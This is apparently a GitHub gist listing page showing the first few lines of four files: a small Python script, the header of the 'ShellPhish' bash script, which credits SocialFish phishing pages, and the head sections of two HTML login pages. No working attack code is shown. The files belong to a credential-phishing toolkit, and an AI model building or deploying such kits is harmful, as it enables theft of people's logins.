This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import random | |
| import sys | |
| from math import log | |
| if sys.version_info < (3, 0): | |
| input = raw_input | |
| # Just some colors and shit | |
| white = '\033[1;97m' | |
| green = '\033[1;32m' |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # ShellPhish v1.7.1 | |
| # Coded by: kemidiin (You dont become a coder by just changing the credits) | |
| # Github: https://github.com/kemidiin/shellphish | |
| # This script uses some Phishing Pages generated by SocialFish tool (UndeadSec) (https://github.com/UndeadSec/SocialFish) | |
| # Instagram Phishing Page generated by K3midi3n (https://github.com/K3midi3n) | |
| trap 'printf "\n";stop;exit 1' 2 | |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html lang="en-Us"> | |
| <head> | |
| <meta charset="utf-8"> | |
| <title>Login</title> | |
| <meta name="viewport" content="width=device-width, initial-scale=1"> | |
| <link href="/vendor/bootstrap-4.1/bootstrap.min.css" rel="stylesheet" media="all"> | |
| <style> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html> | |
| <html> | |
| <head> | |
| <!-- Required meta tags--> | |
| <meta charset="UTF-8"> | |
| <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> | |
| <meta name="description" content="SocialFish"> | |
| <meta name="author" content="UndeadSec"> | |
| <meta name="keywords" content="SocialFish"> |